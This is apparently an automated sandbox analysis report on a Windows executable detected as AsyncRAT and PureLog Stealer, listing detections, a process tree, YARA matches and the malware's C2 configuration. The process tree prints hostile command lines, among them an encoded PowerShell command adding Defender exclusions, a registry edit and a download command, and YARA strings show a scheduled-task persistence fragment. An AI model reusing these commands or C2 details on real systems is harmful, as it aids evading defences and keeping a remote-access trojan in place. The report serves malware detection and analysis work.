Edit tour

Windows Analysis Report
Gm602axA2d.exe

Overview

General Information

Sample name:	Gm602axA2d.exe renamed because original name is a hash value
Original sample name:	2d25ca067a272bd8542cabe1ff9985d1.exe
Analysis ID:	1433165
MD5:	2d25ca067a272bd8542cabe1ff9985d1
SHA1:	594fb8d239a5ffaa654a13415fa95965ba47d2a8
SHA256:	da3a59fdb9f1414f6d726429c609ea5b6377c9d96d22ffb13f75352eec6be3a4
Tags:	AsyncRATexeRAT
Infos:

Detection

AsyncRAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected PureLog Stealer

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Encrypted powershell cmdline option found

Installs new ROOT certificates

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to download and execute files (via powershell)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ProcessChecker

Yara signature match

Classification

Process Tree

System is w10x64

Gm602axA2d.exe (PID: 7136 cmdline: "C:\Users\user\Desktop\Gm602axA2d.exe" MD5: 2D25CA067A272BD8542CABE1FF9985D1)

powershell.exe (PID: 2004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7460 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

Vulvvmkewji.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Vulvvmkewji.exe" MD5: 55B293F5BC4F0A9CA106B3ADC2AF7F79)

AppLaunch.exe (PID: 7608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

Office Installer.exe (PID: 7336 cmdline: "C:\Users\user\AppData\Local\Temp\Office Installer.exe" MD5: 6B9D8041B99E48CAAF20261DFBCB787F)

reg.exe (PID: 7400 cmdline: "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7540 cmdline: "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Lxfrfbi.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Roaming\Lxfrfbi.exe" MD5: 55B293F5BC4F0A9CA106B3ADC2AF7F79)

AppLaunch.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

Lxfrfbi.exe (PID: 8140 cmdline: "C:\Users\user\AppData\Roaming\Lxfrfbi.exe" MD5: 55B293F5BC4F0A9CA106B3ADC2AF7F79)

AppLaunch.exe (PID: 7432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Server": "5512.sytes.net,95.211.208.153", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "Llg9a02PERRO", "Autorun": "false", "Group": "null"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1040e:$x1: AsyncRAT 0x1044c:$x1: AsyncRAT

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Office Installer.exe	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2181412356.0000000006E41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2248433326.0000000007751000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x78fb:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x19ad3:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x2d4e3:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8c10:$a2: Stub.exe 0x8ca0:$a2: Stub.exe 0x1ade8:$a2: Stub.exe 0x1ae78:$a2: Stub.exe 0x2e820:$a2: Stub.exe 0x2e8b0:$a2: Stub.exe 0xc6d7:$a3: get_ActivatePong 0x168af:$a3: get_ActivatePong 0x2a2bf:$a3: get_ActivatePong 0x7b13:$a4: vmware 0x19ceb:$a4: vmware 0x2d6fb:$a4: vmware 0x798b:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x19b63:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x2d573:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xd432:$a6: get_SslClient 0x1760a:$a6: get_SslClient 0x2b01a:$a6: get_SslClient
0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x798d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x19b65:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2d575:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x97b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000000C.00000002.2181412356.0000000006E91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2214020576.0000000005784000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.2114944613.0000000004EF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.2181412356.0000000006F31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x15e09:$x1: AsyncRAT 0x183c1:$x1: AsyncRAT 0x19a0f:$x1: AsyncRAT 0x19a4d:$x1: AsyncRAT 0x48118:$s8: Win32_ComputerSystem
00000003.00000002.1818612437.0000000007169000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1729748988.00000000050C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2b6a7:$x1: AsyncRAT 0x2b6e5:$x1: AsyncRAT
00000011.00000002.2103131027.0000000005465000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2f253:$x1: AsyncRAT 0x2f291:$x1: AsyncRAT
0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc33b:$x1: AsyncRAT 0xc379:$x1: AsyncRAT
0000000F.00000002.2133699444.0000000009596000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcbd3:$x1: AsyncRAT 0xcc11:$x1: AsyncRAT
0000000F.00000002.2027914076.00000000070E1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1da3f:$x1: AsyncRAT 0x1da7d:$x1: AsyncRAT
00000010.00000002.2248433326.0000000007701000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x81c7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x1a39f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x2ddab:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x94dc:$a2: Stub.exe 0x956c:$a2: Stub.exe 0x1b6b4:$a2: Stub.exe 0x1b744:$a2: Stub.exe 0x2f0dc:$a2: Stub.exe 0x2f16c:$a2: Stub.exe 0xcfa3:$a3: get_ActivatePong 0x1717b:$a3: get_ActivatePong 0x2ab87:$a3: get_ActivatePong 0x83df:$a4: vmware 0x1a5b7:$a4: vmware 0x2dfc3:$a4: vmware 0x8257:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1a42f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x2de3b:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xdcfe:$a6: get_SslClient 0x17ed6:$a6: get_SslClient 0x2b8e2:$a6: get_SslClient
00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x8259:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1a431:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2de3d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000010.00000002.2248433326.00000000077F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x74b7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x1968f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x2d0ab:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x87cc:$a2: Stub.exe 0x885c:$a2: Stub.exe 0x1a9a4:$a2: Stub.exe 0x1aa34:$a2: Stub.exe 0x2e3dc:$a2: Stub.exe 0x2e46c:$a2: Stub.exe 0xc293:$a3: get_ActivatePong 0x1646b:$a3: get_ActivatePong 0x29e87:$a3: get_ActivatePong 0x76cf:$a4: vmware 0x198a7:$a4: vmware 0x2d2c3:$a4: vmware 0x7547:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1971f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x2d13b:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xcfee:$a6: get_SslClient 0x171c6:$a6: get_SslClient 0x2abe2:$a6: get_SslClient
00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7549:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x19721:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2d13d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000003.00000002.1818612437.0000000006501000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.2070694207.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2011791495.0000000007730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000002.2121649452.000000000703C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x12a3f:$x1: AsyncRAT 0x12a7d:$x1: AsyncRAT
00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000003.00000002.1729748988.0000000004C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Process Memory Space: Gm602axA2d.exe PID: 7136	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Process Memory Space: Vulvvmkewji.exe PID: 7280	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Vulvvmkewji.exe PID: 7280	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Vulvvmkewji.exe PID: 7280	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Office Installer.exe PID: 7336	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Process Memory Space: AppLaunch.exe PID: 7608	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: AppLaunch.exe PID: 7608	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1bee2:$x1: AsyncRAT 0x1c01a:$x1: AsyncRAT 0x37d5e:$x1: AsyncRAT 0x37d90:$x1: AsyncRAT 0x37da4:$x1: AsyncRAT 0x3faca:$x1: AsyncRAT 0x3fafc:$x1: AsyncRAT 0x1f8dd:$s8: Win32_ComputerSystem 0x1f948:$s8: Win32_ComputerSystem
Process Memory Space: Lxfrfbi.exe PID: 7936	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Lxfrfbi.exe PID: 7936	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Lxfrfbi.exe PID: 7936	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Lxfrfbi.exe PID: 7936	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x17be:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: AppLaunch.exe PID: 8084	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: AppLaunch.exe PID: 8084	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x66a0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: AppLaunch.exe PID: 8084	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcd64:$x1: AsyncRAT 0xcd96:$x1: AsyncRAT 0x2c78d:$x1: AsyncRAT 0x2c7bf:$x1: AsyncRAT 0x6766:$s6: VirtualBox 0x6719:$s8: Win32_ComputerSystem
Process Memory Space: Lxfrfbi.exe PID: 8140	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Lxfrfbi.exe PID: 8140	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Lxfrfbi.exe PID: 8140	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Lxfrfbi.exe PID: 8140	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x52175:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: AppLaunch.exe PID: 7432	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7583:$x1: AsyncRAT 0x75b5:$x1: AsyncRAT 0x23c1b:$x1: AsyncRAT 0x23c4d:$x1: AsyncRAT
Click to see the 54 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.Lxfrfbi.exe.57849f8.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Lxfrfbi.exe.77517a8.19.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9923:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x1d33f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x1e670:$a2: Stub.exe 0x1e700:$a2: Stub.exe 0x66ff:$a3: get_ActivatePong 0x1a11b:$a3: get_ActivatePong 0x9b3b:$a4: vmware 0x1d557:$a4: vmware 0x99b3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1d3cf:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x745a:$a6: get_SslClient 0x1ae76:$a6: get_SslClient
16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1d3d1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.Vulvvmkewji.exe.36bbf70.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Vulvvmkewji.exe.36bbf70.4.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x43457:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x4476c:$a2: Stub.exe 0x447fc:$a2: Stub.exe 0x48233:$a3: get_ActivatePong 0x4366f:$a4: vmware 0x434e7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x48f8e:$a6: get_SslClient
3.2.Vulvvmkewji.exe.36bbf70.4.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x434e9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.Vulvvmkewji.exe.52049f8.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.Lxfrfbi.exe.33f31b0.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
12.2.Lxfrfbi.exe.33f31b0.4.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7b23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48ff:$a3: get_ActivatePong 0x7d3b:$a4: vmware 0x7bb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x565a:$a6: get_SslClient
12.2.Lxfrfbi.exe.33f31b0.4.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7bb5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.Vulvvmkewji.exe.3709a7c.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Vulvvmkewji.exe.3709a7c.2.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7b23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48ff:$a3: get_ActivatePong 0x7d3b:$a4: vmware 0x7bb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x565a:$a6: get_SslClient
3.2.Vulvvmkewji.exe.3709a7c.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7bb5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
16.2.Lxfrfbi.exe.3c35eec.5.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
16.2.Lxfrfbi.exe.3c35eec.5.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x3c7cb:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x3dae0:$a2: Stub.exe 0x3db70:$a2: Stub.exe 0x415a7:$a3: get_ActivatePong 0x4b77f:$a3: get_ActivatePong 0x3c9e3:$a4: vmware 0x3c85b:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x42302:$a6: get_SslClient 0x4c4da:$a6: get_SslClient
16.2.Lxfrfbi.exe.3c35eec.5.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x3c85d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
12.2.Lxfrfbi.exe.6e917a8.20.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.73817c8.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.7291788.17.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Lxfrfbi.exe.7701788.15.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Lxfrfbi.exe.7701788.15.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.4addde8.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.Lxfrfbi.exe.31fb2c0.6.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.7291788.17.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Lxfrfbi.exe.3a87008.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Lxfrfbi.exe.3a87008.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Vulvvmkewji.exe.72e17a8.18.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Lxfrfbi.exe.3c7cd6c.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
16.2.Lxfrfbi.exe.3c7cd6c.3.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7b23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48ff:$a3: get_ActivatePong 0x7d3b:$a4: vmware 0x7bb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x565a:$a6: get_SslClient
16.2.Lxfrfbi.exe.3c7cd6c.3.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7bb5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
12.2.Lxfrfbi.exe.4ef49f8.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
